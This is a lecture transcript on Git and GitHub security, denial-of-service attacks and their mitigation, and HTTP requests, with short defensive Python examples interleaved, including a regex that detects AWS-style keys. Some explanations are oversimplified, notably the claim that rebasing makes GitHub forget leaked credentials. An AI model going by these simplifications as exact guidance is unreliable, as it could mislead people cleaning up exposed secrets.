  • DOUG LLOYD: Now that we know a bit more about the internet and how it works,

  • let's reintroduce the subject of security with this new context.

  • And let's start by talking about Git and GitHub.

  • Recall that Git and GitHub are technologies used by programmers to version control their software.

  • Version control lets them save code to an internet-based repository so that, in case of some local failure, they have a backup copy,

  • but it also keeps track of all the changes they've made and lets them go back in time in case they produce a version of the code that is broken.

  • GitHub has some great advantages, but this structure of being able to go back in time also has potential disadvantages.

  • So for example, imagine that we have an initial commit; a commit is just Git parlance for a set of code changes that you package up and send to the internet.

  • So I've decided to take file A, file B, and file C in their current versions.

  • I've saved them using control S or command S literally on my machine,

  • and I want to send those versions to GitHub to be

  • stored permanently or semi-permanently.

  • You would package those up in what's called a commit

  • and then push that code to GitHub where it would then be visible online.

  • And this would be packaged as a commit.

  • And all the files that we view on GitHub are tracked in terms of commits.

  • And commits chain together.

  • And we've seen this idea of chaining in the past when we've

  • discussed linked lists, for example.

  • So every commit knows about all of the commits that preceded it, and once a later commit is eventually pushed, it is linked into that same chain.

  • So imagine we have an initial commit where we post some code

  • and then we write some more-- we make some more changes.

  • We perhaps update our database in such a way

  • where when we post or push-- excuse me-- our second commit to GitHub,

  • we accidentally expose the database credentials.

  • So perhaps someone inadvertently typed the password

  • for how to access the database into some Python code that would then

  • be used to access that database.

  • That's not a good thing.

  • And maybe somebody quickly realized it and said, you know what?

  • We need to get this off of GitHub.

  • It is a source repository.

  • It's available online.

  • And so they push a third commit to GitHub that deletes those credentials.

  • It stores them somewhere else that's not going to be saved on this repository.

  • But have we actually solved the problem?

  • And you can probably imagine that the answer

  • is no, because we have this idea of version control

  • where every past iteration of all of these files

  • is stored still on GitHub such that, if I needed to, I could go back in time.

  • So even though I attempted to solve the security crisis I just

  • created for myself by introducing a new commit that

  • removes the credentials from those files such that,

  • if I'm looking just at the most recent version of the files,

  • I don't see it anymore.

  • I still have the ability to go back in time,

  • so this doesn't actually solve the problem.

  • See, one of the interesting things about GitHub

  • is the model that is used for it.

  • At the very beginning of GitHub's existence,

  • it relied pretty extensively on this idea of you sign up for free,

  • you get a free account for GitHub, and you

  • have a limited number of private repositories, repositories that are not

  • publicly viewable or searchable, and you could pay to have more of them

  • if you wanted to.

  • But the majority of your repositories, assuming you did not opt into a paid account, were public,

  • which meant anybody on the internet could search them using GitHub's search tool,

  • or even just a regular search engine such as Google.

  • And if your GitHub repositories happened to match what that person searched for--

  • or, if a user was looking for specific lines of code within GitHub's own search feature--

  • anything in a public repository was available to them.

  • Now, GitHub has recently changed to a model where

  • there are more private repo-- or there's a higher limit

  • on the number of private repositories that somebody could have.

  • But this was part of GitHub's design to really encourage

  • developers and programmers to sort of create this open source community where

  • anybody could view someone else's code, and in GitHub parlance,

  • fork their code, which basically means to take their entire repository

  • or collection of files and copy it into their own GitHub repository

  • to perhaps make changes or suggest changes,

  • pushing those back into the code base with the idea being

  • that it would make the entire community better.

  • A side effect, of course, is that items get

  • revealed when we do so because of this public repository setup we have here.

  • So GitHub is great in terms of its ability for programmers

  • to refer to materials on the internet.

  • They don't have to rely on their own local machines to store code.

  • It allows people to work from multiple workstations,

  • similar to how Dropbox or Google Drive, for example,

  • might allow you to access files from different machines.

  • You don't have to be on a specific machine to access a file,

  • as we used to have to do before these cloud-based document storage

  • services existed.

  • And it encourages collaboration.

  • For example, if you and I were to collaborate on a GitHub repository,

  • I could push changes to that repository that you could then pull.

  • And we could then be working off of the same code base again.

  • We sort of have this central repo--

  • central area where we share our code with one another.

  • And we can each individually make changes

  • and incorporate one another's changes into the final products.

  • So we're always working off of the same base of material.

  • The side effect, though, again, is this material

  • is generally public unless you have opted into a private repository where

  • you have specific individuals who are logged

  • in with their GitHub accounts who want to share.

  • So is there a way to solve this problem, though, of having

  • accidentally exposed our credentials in a public repository?

  • Of course, if we're in a private repository,

  • this might not be as alarming.

  • Still, storing credentials for anything, whether public or private, anywhere on the internet

  • is not something that should be encouraged.

  • It's a little riskier.

  • But is there a way to get rid of this or to prevent this problem from happening?

  • And fortunately, there are a number of different safeguards

  • specific to Git and GitHub that we can use

  • to prevent the accidental leakage of information, so to speak.

  • So for example, one way we can handle this is using a program or utility

  • called git-secrets.

  • git-secrets works by looking for what's called a regular expression.

  • And a regular expression is computer science parlance

  • for a particular formation of a string, so a certain number

  • of characters, a certain number of digit characters, maybe some punctuation

  • marks.

  • You can say, I'm looking for strings that match this idea.

  • And you can express this idea where this idea is all capital

  • letters, all lowercase letters, this many numbers, and this many punctuation

  • marks, and so on using this tool called a regular expression.

  • git-secrets contains a list of these regular expressions and will warn you,

  • when you are about to make a commit or push code to GitHub to be stored

  • in its online repository, that you have a string that matches a pattern

  • that you wanted it to warn you about.

  • And so be sure before you commit this code

  • and push this code that you actually intend to send this up

  • to GitHub, because it may be that this matches a password string that you're

  • trying to avoid.

  • So that's an interesting tool that can be used for that.
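
To make that concrete, here is a minimal sketch in Python of the kind of pattern check such a tool performs. The pattern below, shaped like an AWS access key ID, is just an illustrative example; git-secrets ships with its own patterns and scans files before they are committed or pushed.

    import re

    # Hypothetical example pattern: the literal prefix "AKIA" followed by
    # 16 uppercase letters or digits, the shape of an AWS access key ID.
    SECRET_PATTERN = re.compile(r"AKIA[0-9A-Z]{16}")

    def scan_for_secrets(text):
        """Return any substrings that look like leaked credentials."""
        return SECRET_PATTERN.findall(text)

    staged_code = 'aws_key = "AKIAABCDEFGHIJKLMNOP"  # oops'
    matches = scan_for_secrets(staged_code)
    if matches:
        print("WARNING: possible credential about to be committed:", matches)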

  • You also want to consider limiting third party app access.

  • GitHub accounts are actually very commonly used as a form of login for other services.

  • There's a protocol called OAuth which allows you to use, for example,

  • your Facebook account or your Google account to log into other services.

  • Perhaps you've encountered this in your own experience working

  • with different services on the internet.

  • Instead of creating a login for site x, you could use your Facebook or Google

  • login, or, in many instances as well, your GitHub login to do so.

  • When you do so, though, you are allowing that third party application,

  • someone that's not GitHub, the ability to use and access your GitHub identity

  • or credential.

  • And so you should be very careful with not only GitHub but other services

  • as well, thinking about whether you want that other service to have access

  • to your GitHub, or Facebook, or Google account information to use it even just

  • for authentication.

  • It's a good idea to try and limit how much third party app

  • access you're giving to other services.

  • Another tool is to use something called a commit hook.

  • Now, commit hook is just a fancy term for a short program

  • or set of instructions that executes when a commit is pushed to GitHub.

  • So for example, many of the course websites

  • that we use here at Harvard for CS50 are GitHub-based,

  • which means that when we want to change the content on the course website,

  • we update some HTML, or Python, or JavaScript files, we push those

  • to GitHub, and that triggers a commit hook, where basically that commit

  • hook copies those files onto our web server

  • and runs some tests on them to make sure that there are no errors in them.

  • For example, if we wrote some JavaScript or Python that was breaking,

  • it had a bug in it, we'd rather not deploy that bug so to speak.

  • We wouldn't want the broken version of the code

  • to replace the currently working website.

  • And so a commit hook can be used to do testing as well.

  • And then once all the tests pass, we then

  • are able to activate those files on the web server

  • and the changes have happened.

  • So we're using GitHub to store the changes

  • that we want to make on our site, the HTML, the Python,

  • the JavaScript changes that we want to make.

  • And then we're using this commit hook, a set of instructions,

  • to copy them over and actually deploy those changes to the website

  • once we've verified that we haven't made anything break.

  • You can also use commit hooks, for example, to check for passwords

  • and have it warn you if you have perhaps leaked a credential.

  • And then you can undo that with a technique

  • that we'll see in just a moment.

  • Another thing that you can do when using GitHub to protect or verify

  • your identity is to use an SSH key.

  • SSH keys are a special form of a public and private key.

  • In this case, it's really not used for encryption, though.

  • It's actually used as identification.

  • And so this idea of digital signatures, which

  • you may recall from a few lectures ago, comes back into play.

  • Whenever I use an SSH key to push my code to GitHub, what happens

  • is I also digitally sign the commit when I send it up.

  • And so before that commit gets posted to GitHub,

  • GitHub verifies this by checking my public key

  • and verifying, using the mathematics that we've seen in the past,

  • that, yes, only Doug could have sent this,

  • because only Doug's public key will unscramble this set of zeros and ones,

  • and that signature could only have been created with his private key.

  • These two things are reciprocal of one another.

  • So we can use SSH keys and digital signatures

  • as an identity verification scheme as well for GitHub

  • as we might be able to for mailing documents, or sending

  • documents, or something like that.
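
For a sense of the mechanics, here is a minimal sketch of signing and verifying with an RSA key pair, using the third-party Python package cryptography. GitHub's actual SSH and commit-signing flow involves more machinery, but the underlying check is the same: only the private key can produce the signature, and anyone holding the matching public key can verify it.

    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import padding, rsa

    # Generate a key pair (in practice you would load your existing key).
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    public_key = private_key.public_key()

    message = b"commit 1a2b3c: fix typo in README"

    # Only the holder of the private key can produce this signature.
    signature = private_key.sign(
        message,
        padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                    salt_length=padding.PSS.MAX_LENGTH),
        hashes.SHA256(),
    )

    # Anyone with the public key can check it; tampering raises InvalidSignature.
    try:
        public_key.verify(
            signature,
            message,
            padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                        salt_length=padding.PSS.MAX_LENGTH),
            hashes.SHA256(),
        )
        print("signature valid: this really came from the key's owner")
    except InvalidSignature:
        print("signature invalid: the message or signature was altered")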

  • Now, imagine we have posted the credentials accidentally.

  • Is there a way to get rid of them?

  • GitHub does track our entire history.

  • But what if we do make a mistake?

  • Human beings are fallible.

  • And so there is a way to actually eliminate the history.

  • And that is using a command called git rebase.

  • So let's go back to the illustration we had a moment ago where

  • we have several different commits.

  • And I've added a fourth commit here just for purposes of illustration.

  • So our first commit and our second commit,

  • and then it's after that that we expose the credentials accidentally,

  • and then we have a fourth commit where we actually delete that mistake that we

  • had previously made.

  • When we git rebase, the idea is that we want to delete a portion of the history.

  • In this illustration, we're going to get rid of the last two commits.

  • Deleting a portion of the history has a side effect, though:

  • any changes that I made in those commits, besides accidentally exposing the credentials,

  • are also going to be destroyed.

  • And so it's going to be incumbent on us to make sure to copy and save

  • the changes we actually want to preserve in case we've done more than just

  • expose the credentials.

  • And then we'll have to make a new commit in this new history

  • we create so that we can still preserve those changes that we want to make.

  • But let's say, other than the credentials,

  • I didn't actually do anything else.

  • One thing I could do is rebase or set as a new start point, basically,

  • this second commit as the end of the chain.

  • So instead of going all the way to here and having that preserved ad infinitum,

  • I want to just get rid of everything from the second commit forward.

  • And I can do that.

  • And then those commits are no longer remembered by GitHub.

  • And the next commit I make would go right here, after the second commit,

  • as opposed to after the commit that removed the credentials,

  • so those deleted commits are, for all intents and purposes on GitHub, forgotten.

  • And finally, one more thing that we can do when using GitHub

  • is to mandate the use of two-factor authentication.

  • Recall we've discussed two-factor authentication a little bit previously.

  • And the idea is that you have a backup mechanism

  • to prevent unauthorized login.

  • And the two factors in two-factor authentication

  • are not two passwords, because those are fundamentally quite similar.

  • The idea is that you want to have something that you know, for example,

  • a password-- that's usually very commonly one of the two factors

  • in two-factor authentication--

  • and something that you have, the thought being

  • that an adversary is incredibly unlikely to have both things at the same time.

  • They may know your password, but they probably

  • don't have your cell phone, for example, or your RSA key.

  • They may have stolen your phone or they may have stolen your RSA key,

  • but they probably don't also know your password.

  • And so the idea is that this provides an additional level of defense

  • against potential hacking, or breaking into accounts,

  • or unauthorized behavior in accounts that you obviously

  • don't want to happen.

  • Now, an RSA key, if you're unfamiliar, is something that looks like this.

  • There's different versions of them.

  • They've sort of evolved over time.

  • This one is actually a combined RSA key and USB drive.

  • And inside the window here of the RSA key

  • is a six digit number that just changes every 60 seconds or so.

  • So when you are given one of these, for example,

  • perhaps at a firm or a business, it is assigned to you specifically.

  • There's a server that your IT team will have

  • set up that maps the serial number on the back of this RSA key

  • to your employee ID, for example.

  • But they otherwise don't know what the number currently on the RSA key is.

  • They only know who owns it, who is physically in possession of it, which

  • employee ID it maps to.

  • And every 60 seconds it changes according

  • to some mathematical algorithm that is built into the key that generates

  • numbers in a pseudo random way.

  • And after 60 seconds, that code will change into something else.

  • And you'll need to actually have the key on you to complete a login.

  • If an RSA key is being used to secure a login such

  • that you need to enter a password and your RSA key's value,

  • you would need to have both.

  • No other employee RSA key-- well, hypothetically, I

  • guess there's a one in a million chance that it

  • would happen to be randomly showing the same number at the same time.

  • But no other employee's RSA key could be used to log in.

  • Only yours could be used to log in.

  • Now, there are several different tools out there

  • that can be used to provide two-factor authentication services.

  • And there's really no technical reason not to use these services.

  • You'll find them as applications on cell phones, most likely.

  • And you'll find ones like this, Google Authenticator, Authy, Duo Mobile.

  • There are lots of others.

  • And if you don't want to use one of those applications specifically,

  • many services also just allow you to receive a text message

  • from the service itself.

  • And you'll just get that via SMS on your phone,

  • so still on your phone, just not tied to a specific application.
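
For the curious, the rotating six-digit codes that authenticator apps display come from a published algorithm, TOTP (RFC 6238): a shared secret is combined with the current time and hashed. Hardware tokens like RSA SecurID use their own algorithm, but the idea is the same. A minimal Python sketch, using a made-up example secret:

    import base64, hashlib, hmac, struct, time

    def totp(secret_b32, interval=30, digits=6):
        """Time-based one-time password (RFC 6238), the scheme behind most
        authenticator apps. secret_b32 is the base32 secret shared with the
        server when you first set up two-factor authentication."""
        key = base64.b32decode(secret_b32, casefold=True)
        counter = int(time.time()) // interval            # changes every 30 seconds
        msg = struct.pack(">Q", counter)                  # 8-byte big-endian counter
        digest = hmac.new(key, msg, hashlib.sha1).digest()
        offset = digest[-1] & 0x0F                        # dynamic truncation
        code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    print(totp("JBSWY3DPEHPK3PXP"))  # example secret; prints a six-digit code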

  • And while there's no technical reason to avoid two-factor authentication,

  • there is sort of this social friction surrounding

  • two-factor authentication in that human beings tend to find it annoying, right?

  • It used to be username, password, you're logged in.

  • It's pretty quick.

  • Now it's username, password, you get brought to another screen,

  • you're asked to enter a six-digit code, or maybe in some advanced applications

  • you get a push notification sent to your device that you have to unlock

  • and then hit OK on the device.

  • And people just find that inconvenient.

  • We haven't yet reached this point culturally

  • where two-factor authentication is the norm.

  • And so this is sort of a linchpin when we talk about security

  • in the internet context: human beings are the limiting factor

  • for how secure we can be.

  • We have the technology to take steps to protect ourselves,

  • but we don't feel compelled to do so.

  • And we'll see this pattern reemerge in a few other places today.

  • But just know that that is why perhaps you're

  • not seeing so much adoption of two-factor authentication.

  • It's not that it's technically infeasible to do so.

  • It's just that we just find it annoying to do so,

  • and so we don't adopt it as aggressively as perhaps we should.

  • Now let's discuss the type of attack that

  • occurs on the internet with unfortunate regularity,

  • and that is the idea of a denial of service attack.

  • Now, the idea behind these attacks is basically

  • to cripple the infrastructure of a website.

  • Now, the reason for this might be financial.

  • You want to try and sabotage somebody.

  • There might be other motivations, distraction, for example,

  • by tying up their resources, trying to stop the attack.

  • It opens up another avenue to do something else,

  • to perhaps steal information.

  • There's many different motivations for why they do this.

  • And some of them are honestly just boredom or fun.

  • Amateur hackers sometimes think it's fun to just initiate

  • a denial of service attack against an entity that

  • is not prepared to handle it.

  • Now, in the associated materials for this course,

  • we provided an article called Making Cyberspace Safe for Democracy, which

  • we really do encourage you to take a look at, read,

  • and discuss with your group.

  • But I also want to take a little bit of time right

  • now just to talk about this article in particular

  • and draw your attention to some areas of concern

  • or some areas that might lead to more discussion.

  • Now, the biggest of these is these attacks

  • tend not to be taken very seriously by people when they hear about them.

  • You'll occasionally hear about these attacks in the news,

  • denial of service attacks, or their cousin,

  • distributed denial of service attacks.

  • But culturally, again, us being humans and sort

  • of neglecting some of the real security concerns here,

  • we don't think of it as an attack.

  • And that's maybe because of how we hear about other kinds of attacks

  • on the news that seem more physically devastating,

  • that have more real consequences.

  • And it makes it hard to have a serious conversation about cyber attacks

  • because there's this friction that we face trying to get people to understand

  • that these are meaningful and real.

  • And in particular, these attacks are kind of insidious.

  • They're really easy to execute without much difficulty at all,

  • especially against a small business that might be running its own server as

  • opposed to relying on a cloud service.

  • A pretty top-of-the-line, commercially available machine might be able

  • to execute a denial of service or DoS attack on its own.

  • It doesn't even require exceptional resources.

  • Now, when we start to attack mid-sized companies, or larger companies

  • or entities, one single computer from one single IP address

  • is not typically going to be enough.

  • And so instead, you would have a distributed denial of service attack.

  • In a distributed denial of service attack,

  • there is still generally one core hacker, or one collective group

  • of hackers or adversaries that are trying

  • to penetrate some company's defenses.

  • But they can't do it with their own machine.

  • And so what they do is create something called a botnet.

  • Perhaps you've heard this term before.

  • A botnet basically happens, or is created,

  • when hackers or adversaries distribute worms or viruses sort of

  • surreptitiously.

  • Perhaps they packaged them into some download.

  • People don't notice anything about the worm or anything

  • about this program that has been covertly installed on their machine.

  • It doesn't do anything in particular until it is activated.

  • And then it becomes an agent or a zombie--

  • sometimes you'll hear it termed that as well--

  • controlled by the hackers.

  • And so all of a sudden the adversaries gain

  • control of many different devices, hundreds or thousands

  • or tens of thousands, or even more in some of the bigger attacks

  • that have happened, basically turning these computers--

  • rendering all of them under their control

  • and being able to direct them to take whatever action they want.

  • And in particular, in the case of a distributed denial of service attack,

  • all of these computers are going to make web requests

  • to the same server or same website, because that's the idea.

  • You have so many requests.

  • Between distributed denial of service attacks

  • and regular denial of service attacks, it's really just a question of scale.

  • We're hitting those servers with so many web requests--

  • I want to access this, I want to access this-- hundreds, thousands, tens of thousands

  • of these requests a second, such that the server

  • can't possibly field all of these inquiries

  • that are coming in and give each request the data it's asking for.

  • Ultimately, that would eventually, after enough time,

  • result in the server just crashing, throwing up its hands and saying,

  • I don't know what to do.

  • I can't possibly process all of these requests.

  • But by tying it up in this way, the adversary

  • has succeeded in damaging the infrastructure of the server.

  • It's either denied the server the ability to process customers

  • and payments or it's just taken down the entire website

  • so there's no information available about the company anymore to anybody

  • who's trying to look it up.

  • These attacks are actually really, really common.

  • There are surveys that go out every year assessing that roughly one sixth to one third

  • of the average-sized businesses that take part

  • suffer some sort of DoS attack in a given year, so 16% to 35% or so

  • of businesses, which is a lot of businesses when you think about it.

  • And these attacks are usually quite small,

  • and they're certainly not newsworthy.

  • They might last a few minutes.

  • They might last a few hours.

  • But they're enough to be disruptive.

  • They're certainly noteworthy.

  • And they're something to avoid if it's possible.

  • Cloud computing has made this problem kind of worse.

  • And the reason for this is that, in a cloud computing context,

  • your server that is running your business

  • is not physically located on your premises.

  • It was often the case that when a business would run a website

  • or would run their business, they would have a server room that

  • had the software that was necessary to run their website

  • or to run whatever software-based services they provided.

  • And it was all local to that business.

  • No one else could possibly be affected.

  • But in a cloud computing context, we are generally

  • renting server space and server power from an entity such as Amazon Web

  • Services, or Google Cloud Services, or some other large provider where

  • it might be that 10, 20, 50, depending on the size of the business in question

  • here--

  • multiple businesses are sharing the same physical resources,

  • and they're sharing the same server space,

  • such that if any one of those 50, let's say,

  • businesses is targeted by hackers or adversaries

  • for a denial of service attack, that might actually, as collateral damage,

  • take out the other 49 businesses.

  • They weren't even part of the attack.

  • But cloud computing is--

  • we've heard about it as it's a great thing.

  • It allows us to scale out our websites, make it

  • so that we can handle more customers.

  • It takes away the problem of security, web-based security,

  • because we're outsourcing that to the cloud provider to give that to us.

  • But it now introduces this new problem of, if we're all sharing the resources

  • and any one of us gets attacked, then all of us

  • lose the ability to access those resources and use them,

  • which might cause all of our organizations to suffer

  • the consequences of one single attack.

  • This collateral damage can get even worse when you think about

  • businesses whose service is providing part of the internet's own infrastructure.

  • So a very common example of this, or a noteworthy example

  • of this, happened in 2016 with a service called

  • DYN, D-Y-N. DYN is a DNS service provider,

  • DNS being the domain name system.

  • And the idea there is to map the things like www.google.com to its IP address.

  • Because in order to actually access anything on the internet

  • or to have a communication with anyone, you need to know their IP address.

  • And as human beings, we tend not to actually remember

  • what some website's IP address is, much like we may not recall a certain phone

  • number.

  • But if it has a mnemonic attached to it-- so for example,

  • you know back in the day we had 1-800-COLLECT for collect calls.

  • If you forgot the number, the literal digits of that phone number,

  • you could still remember the idea of it because you had this mnemonic device

  • to help remind you.

  • Domain names, www.whatever.com, are just mnemonic devices

  • that we use to refer to an IP address.

  • And DNS servers provide this service to us.
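
In code, asking the operating system's resolver to perform that lookup is a one-liner; a quick Python illustration (the address printed will vary):

    import socket

    # Translate a human-memorable domain name into the numeric IP address
    # that the network actually routes traffic to.
    print(socket.gethostbyname("www.google.com"))  # e.g. 142.250.65.196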

  • DYN is one of the major DNS providers for the internet overall.

  • And if a denial of service attack-- in this case it was certainly

  • a distributed denial of service attack, because it was enormous--

  • goes after that provider, pinging its IP address or hitting its servers over

  • and over and over, then it is unable to field requests from anyone else,

  • because it's just getting pummeled by all of these requests from some botnet

  • that some adversary or collective of adversaries has taken control of.

  • The collateral damage is that no one can

  • map a domain name to an IP address anymore, which

  • means no one can visit any of these websites

  • unless they happen to already know what the IP address of a given

  • website is.

  • If you knew the IP address, this wasn't a problem.

  • You could just still directly go to that IP address.

  • That's not the kind of attack here.

  • But the attack instead tied up the ability

  • to translate these mnemonic names into numbers.

  • And as you can see, DYN was a DNS-- or is

  • a DNS provider for much of the eastern half of the United States

  • as well as the Pacific Northwest and California.

  • And if you think about what kinds of businesses

  • are headquartered in the Pacific Northwest

  • and in California and in the New York area, for example,

  • you probably see that some major, major services,

  • including GitHub, which we've already talked about today,

  • but also Facebook and others--

  • Harvard University's website was also taken down for several hours.

  • This attack lasted about 10 hours, so quite prolonged.

  • It really did a lot of damage on that day.

  • It really crippled the ability of people to use the internet

  • for a long period of time, so kind of very interesting.

  • This article also talks a bit about how the United States government--

  • the legislature-- has decided to

  • handle these kinds of issues, computer-based attacks.

  • It takes a look at the Computer Fraud and Abuse

  • Act, which is codified at 18 U.S.C. § 1030.

  • And this is really the only computer crimes, general computer crimes,

  • law that is on the books and talks about what

  • it means to be a protected computer.

  • And you'll be interested to know perhaps that any computer pretty much is

  • a protected computer.

  • The law specifically calls out government computers as well as

  • any computer that may be involved in interstate commerce,

  • which, as you can imagine, means that anybody who uses the internet

  • has a computer that falls under the ambit of this act.

  • So it's another interesting thing to take a look

  • at if you're interested in how we deal with processing or prosecuting

  • violations of computer-based crimes.

  • All of it is actually sort of dealt with in the Computer Fraud and Abuse

  • Act, which is not terribly long and hasn't been updated extensively

  • since the 1980s other than some small amendments.

  • So it's kind of interesting that we have not yet

  • gotten to the point where we are defining and prosecuting

  • specific types of computer crime, even though we've begun to figure out

  • different types of computer crimes, such as DoS attacks, such as phishing,

  • and so on.

  • Now, hypothetically, a simple denial of service attack

  • should be pretty easy to stop.

  • And the reason for that is that there's only one person making the attack.

  • Recall that web requests happen over the internet via HTTP,

  • and every request carries the sender's IP address

  • as part of the envelope that gets sent over,

  • such that the server that wants to respond to the client, or the sender,

  • can just reference it.

  • It's the return address.

  • You need to be able to know where to send the data back to.

  • And so in a simple denial of service attack, there are thousands of requests that might

  • be coming from a single IP address.

  • If you see that happening, you can just decide as a server in the software

  • to stop accepting requests from that address.
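
A minimal sketch of that logic in Python, with made-up thresholds: count each address's recent requests and stop serving any address that exceeds the limit. Real servers and firewalls implement this far more carefully, but the policy is the same.

    import time
    from collections import defaultdict

    LIMIT = 100   # requests allowed per source address ...
    WINDOW = 10   # ... within this many seconds

    hits = defaultdict(list)
    blocked = set()

    def allow_request(ip):
        """Return True if we should still serve this address."""
        if ip in blocked:
            return False
        now = time.time()
        hits[ip] = [t for t in hits[ip] if now - t < WINDOW]  # keep recent hits only
        hits[ip].append(now)
        if len(hits[ip]) > LIMIT:
            blocked.add(ip)  # one source flooding us: just cut it off
            return False
        return True

    print(allow_request("203.0.113.7"))  # True for a normal visitor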

  • DDoS attacks, distributed denial of service attacks,

  • are much harder to stop.

  • And it's exactly because of the fact that there is not a single source.

  • If there's a single source, again, we would just completely

  • stop accepting any requests of any type from that computer.

  • However, because we have so many different computers to contend with,

  • the options to handle this are a bit more limited.

  • There are some techniques for averting them or stopping them

  • once they are detected, however, the first of which is firewalling.

  • So the idea of a firewall is we are only going

  • to allow requests of a certain type.

  • We're going to allow them from any IP address,

  • but we're only going to accept them into this port.

  • Recall that TCP/IP gives us the ability to say this service

  • comes in via this port, so HTTP requests come in via port 80.

  • HTTPS requests come in via port 443.

  • So imagine a distributed denial of service attack

  • where typically the site would expect to be receiving requests on HTTPS.

  • It generally only uses secured HTTP in order

  • to process whatever requests are coming in.

  • So it's expecting to receive a lot of traffic on port 443.

  • And then all of a sudden a distributed denial of service attack

  • begins and it's receiving lots of requests on port 80.

  • One way to stop that attack before it starts to tie up resources

  • is to just put a firewall up and say, I'm

  • not actually going to accept any requests on port 80.

  • And this may have a side effect of denying certain legitimate requests

  • from getting through.

  • But since the vast majority of the traffic that I receive on the site

  • comes in via HTTPS on port 443, that's a small price to pay.

  • I'd rather just allow the legitimate requests to come in.

  • So that's one technique.
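
As a toy illustration of that policy (real firewalls such as iptables or cloud security groups enforce it below the application layer, and the packet dictionary here is hypothetical):

    # Accept connections only on the ports we actually serve (HTTPS on 443
    # in this example) and drop everything else.
    ALLOWED_PORTS = {443}

    def firewall_decision(packet):
        """packet is assumed to be a dict with a 'dst_port' field."""
        return "ACCEPT" if packet["dst_port"] in ALLOWED_PORTS else "DROP"

    print(firewall_decision({"dst_port": 443}))  # ACCEPT
    print(firewall_decision({"dst_port": 80}))   # DROP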

  • Another technique is something called sinkholing.

  • And it's exactly what you probably think it is.

  • So a sinkhole, as you probably know, is a hole

  • in the ground that swallows everything up.

  • And a sinkhole in a digital context is a big black hole, basically, for data.

  • It's just going to swallow up every single request

  • and just not allow any of them out.

  • So this would, again, stop the denial of service attack

  • because it's just taking all the requests

  • and basically throwing them in the trash.

  • This won't take down the website of the company that's being attacked,

  • so that's a good thing.

  • But it's also not going to allow any legitimate traffic of any type

  • through, so that might be a bad thing.

  • But depending on the length of the attack-- if it

  • seems like it's going to be short, and the requests trickle off

  • and stop because the attackers realize they're not making any progress,

  • not getting the results that they had hoped for--

  • then perhaps they would give up.

  • Then the sinkhole could be stopped and regular traffic

  • could start to flow through again.

  • So a sinkhole is basically just take all the traffic that comes in

  • and just throw it in the trash.

  • And then finally, another technique we could use

  • is something called packet analysis.

  • So again, HTTP, we know, is how requests are made via the web.

  • And we learned a little bit about the headers

  • that are packaged alongside those HTTP packets:

  • where the request originated from, where it's going to.

  • There's a whole lot of other metadata as well.

  • You'll know, for example, what type of browser the individual is using,

  • perhaps what operating system they are using,

  • and roughly where, as a geographical generalization, they are.

  • Are they in the US Northeast?

  • Are they in South America and so on?

  • Instead of deciding to restrict traffic via specific ports

  • or just restrict all traffic, we could still allow all traffic to come in

  • but inspect all of the packets as they come in.

  • So for example, perhaps most of the traffic on our site we

  • are expecting to come from the--

  • just because I used that example already--

  • US Northeast.

  • And then all of a sudden we are experiencing

  • tons of packets coming in that have IP addresses that all seem to be based--

  • or they have, as part of their packets, information

  • that says that they're from South America,

  • or they're from the US West Coast, or somewhere else that we don't expect.

  • We can decide, after taking a quick look at that packet

  • and analyzing those individual headers, that I'm not

  • going to accept any packets from that location.

  • The ones that match locations I'm expecting, I'll let through.

  • And this, again, might prevent certain customers from getting through,

  • certain legitimate customers who might actually be based in South America

  • from getting through.

  • But in general, it's going to block most of the damaging traffic.
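
A sketch of that kind of inspection, again with hypothetical request objects; in practice the geographic hint comes from an IP-geolocation lookup on the source address rather than from the HTTP headers themselves:

    # Drop requests whose metadata doesn't match the traffic we normally see.
    EXPECTED_REGIONS = {"us-northeast"}
    EXPECTED_AGENT_KEYWORDS = ("Mozilla", "Chrome", "Safari", "Firefox")

    def should_accept(request):
        if request["region"] not in EXPECTED_REGIONS:
            return False  # unexpected origin: drop it
        agent = request["headers"].get("User-Agent", "")
        return any(k in agent for k in EXPECTED_AGENT_KEYWORDS)  # crude bot filter

    print(should_accept({"region": "us-northeast",
                         "headers": {"User-Agent": "Mozilla/5.0 ... Chrome/120"}}))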

  • DDoS attacks are really frustrating for companies

  • because they really can do a lot of damage.

  • Usually the resources of the company being attacked-- especially

  • if they're cloud-based and they rely on their cloud provider to help them

  • scale up-- are enough to eventually outlast and stop

  • the attacker, who usually has a much more limited set of resources.

  • But again, depending on the type of business being attacked in this way--

  • again, think of the example of DYN, the DNS provider.

  • The ramifications for one of these attacks

  • can be really quite severe and really quite annoying and costly

  • for a business that suffers it.

  • So we just talked about HTTP and HTTPS a moment ago

  • when we were talking about firewalling, allowing

  • some traffic on some of the ports but not other ports,

  • so in that example allowing HTTPS traffic but not HTTP traffic.

  • Let's take a look at these two technologies in a bit more detail.

  • So HTTP, again, is the hypertext transfer protocol.

  • It is how hypertext or web pages are transmitted over the internet.

  • If I am a client and I make a request to you for some HTML content,

  • then you as a server would send a response back to me,

  • and then I would be able to see the page that I had requested.

  • And every HTTP request has a specific format at the beginning of it.

  • For example, we might see something like this: GET /execed HTTP/1.1, Host:

  • law.harvard.edu.

  • Let's just quickly pick these apart again one more time.

  • If you see GET at the beginning of an HTTP request,

  • it means please fetch or get for me, literally, this page.

  • The page I'm requesting specifically is /execed.

  • And the host that I'm asking it from is, in this case, law.harvard.edu.

  • So basically what I'm saying here is please fetch for me,

  • or retrieve for me, the HTML content that comprises

  • http://law.harvard.edu/execed.

  • And specifically I'm doing this using HTTP protocol version 1.1.

  • We're still widely using version 1.1 even though

  • version 2.0 of the protocol has since been standardized.

  • And basically this is just HTTP's way of identifying

  • how you're asking the question.

  • So it's similar to me making a request and saying, oh, by the way,

  • the rest of this request is written in French, or, oh, by the way,

  • the rest of this request is written in Spanish.

  • It's more like here are the parameters that you

  • should expect to see because this request is

  • in version 1.1, which differed non-trivially from version 1.0.

  • So it's just an identifier for how exactly we are formatting our request.
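
To see that format in action, here is a minimal Python sketch that opens a plain TCP connection to port 80 and sends exactly this kind of request by hand (the server may answer with the page itself or with a redirect to the HTTPS version):

    import socket

    request = (
        "GET /execed HTTP/1.1\r\n"
        "Host: law.harvard.edu\r\n"
        "Connection: close\r\n"
        "\r\n"
    )

    # Plain, unencrypted HTTP travels over an ordinary TCP connection to port 80.
    with socket.create_connection(("law.harvard.edu", 80)) as sock:
        sock.sendall(request.encode("ascii"))
        response = b""
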